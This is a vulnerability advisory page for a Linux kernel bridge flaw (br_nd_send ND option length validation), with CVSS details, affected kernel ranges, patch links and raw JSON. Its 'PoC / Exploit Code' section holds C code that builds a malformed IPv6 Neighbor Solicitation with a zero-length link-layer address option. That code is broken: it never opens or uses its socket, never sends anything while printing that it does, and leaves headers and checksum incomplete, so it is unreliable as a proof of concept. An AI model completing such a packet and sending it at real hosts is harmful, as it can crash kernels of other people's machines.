Security Vulnerability Report
CVE-2026-31752 CVSS 5.5 MEDIUM

Published: 2026-05-01 15:16:38
Last Modified: 2026-05-07 19:08:56
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

bridge: br_nd_send: validate ND option lengths

br_nd_send() walks ND options according to option-provided lengths. A malformed option can make the parser advance beyond the computed option span or use a too-short source LLADDR option payload.

Validate option lengths against the remaining NS option area before advancing, and only read source LLADDR when the option is large enough for an Ethernet address.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel (for affected versions, see the Git patch records and each distribution's advisories)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-31752: Linux Kernel br_nd_send ND Option Validation
 * This code demonstrates how to craft a malformed IPv6 Neighbor Discovery packet
 * with an invalid option length to potentially trigger the vulnerability.
 * Compilation: gcc -o poc_cve2026_31752 poc_cve2026_31752.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <arpa/inet.h>

#define BUFFER_SIZE 1024

int create_raw_socket(const char *iface) {
    int sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (sockfd < 0) {
        perror("socket");
        exit(EXIT_FAILURE);
    }
    return sockfd;
}

int main(void) {
    int sockfd;
    struct sockaddr_ll sa;
    unsigned char buffer[BUFFER_SIZE];

    memset(buffer, 0, BUFFER_SIZE);

    // Ethernet Header
    struct ethhdr *eth = (struct ethhdr *)buffer;

    // Set destination MAC (Multicast for ND)
    eth->h_dest[0] = 0x33;
    eth->h_dest[1] = 0x33;
    eth->h_dest[2] = 0xff;
    eth->h_dest[3] = 0x00;
    eth->h_dest[4] = 0x00;
    eth->h_dest[5] = 0x01;

    // Set source MAC (Placeholder)
    memset(eth->h_source, 0x02, 6);
    eth->h_proto = htons(ETH_P_IPV6);

    // IPv6 Header
    unsigned char *ipv6_payload = buffer + sizeof(struct ethhdr);

    // Simplified IPv6 header construction for brevity
    // Next Header: ICMPv6 (58)
    ipv6_payload[6] = 0x3A;
    // Hop Limit
    ipv6_payload[7] = 255;

    // Calculate offsets for ICMPv6 payload
    // Assuming basic IPv6 header is 40 bytes
    int icmp_offset = sizeof(struct ethhdr) + 40;
    unsigned char *icmp = buffer + icmp_offset;

    // ICMPv6 Neighbor Solicitation Type (135)
    icmp[0] = 135;
    icmp[1] = 0; // Code
    icmp[2] = 0;
    icmp[3] = 0; // Checksum (placeholder, would need calc)

    // Reserved (4 bytes) + Target Address (16 bytes) = 20 bytes
    // Options start at offset 24 within ICMP

    // Malformed ND Option
    // Type: Source Link-Layer Address (1)
    // Length: 1 (This is 8 bytes, but let's try to trigger logic where length is invalid relative to payload)
    // To trigger the specific bug "use a too-short source LLADDR option payload":
    // We set Type=1 (SrcLLA) but Length=0 or a small value that implies valid data isn't there.
    // Or Length is huge causing OOB read.
    int opt_offset = icmp_offset + 24;
    buffer[opt_offset] = 1;     // Type: Source Link-Layer Address
    buffer[opt_offset + 1] = 0; // Length: 0 (Malformed, causes logic error in validation)
    // No MAC address follows, or insufficient data.

    printf("Sending malformed ND packet for CVE-2026-31752...\n");

    // Note: Sending requires appropriate privileges and network interface configuration.
    // This is a conceptual structure.
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31752", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T15:16:38.090", "lastModified": "2026-05-07T19:08:55.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbridge: br_nd_send: validate ND option lengths\n\nbr_nd_send() walks ND options according to option-provided lengths.\nA malformed option can make the parser advance beyond the computed\noption span or use a too-short source LLADDR option payload.\n\nValidate option lengths against the remaining NS option area before\nadvancing, and only read source LLADDR when the option is large enough\nfor an Ethernet address."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "5.10.253", "matchCriteriaId": "202FFB00-4CA7-44CB-ACA1-E88A2BF2264B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.203", "matchCriteriaId": "20DDB3E9-AABF-4107-ADB0-5362AA067045"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", 
"versionEndExcluding": "6.1.168", "matchCriteriaId": "E2DDDCA1-6DAB-4018-B920-8F045DDD8D3B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.134", "matchCriteriaId": "F56F925B-BAF8-4F4B-B62F-1496AF19A307"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.81", "matchCriteriaId": "6EF80433-B33B-43C5-8E64-0FA7B8DCE1BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.22", "matchCriteriaId": "C9DF8BCE-36D3-475D-9D21-19E4F02F9029"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.12", "matchCriteriaId": "0A2B9540-02D5-41B4-B16A-82AF66FD4F36"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/259466f76f5a2148aff11134e68f4b4c6d52725b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": 
"https://git.kernel.org/stable/c/82a42eceec7c6bdb0e0da94c0542a173b7ea57f2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/837392a38445729c22e03d3abcf33f07763efd85", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/850837965af15707fd3142c1cf3c5bfaf022299b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c49b9256bbacb6a135654aebd12e4c0e87166b7c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e0bfd6d4dc77ab345b6c65eef0cfe9b2f69085aa", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e71303a9190496136e240c4f2872b7b0b16027a7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ee02d8991fd7bd86ed6ebd0deb4aab53feb0e43a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "t ... (truncated)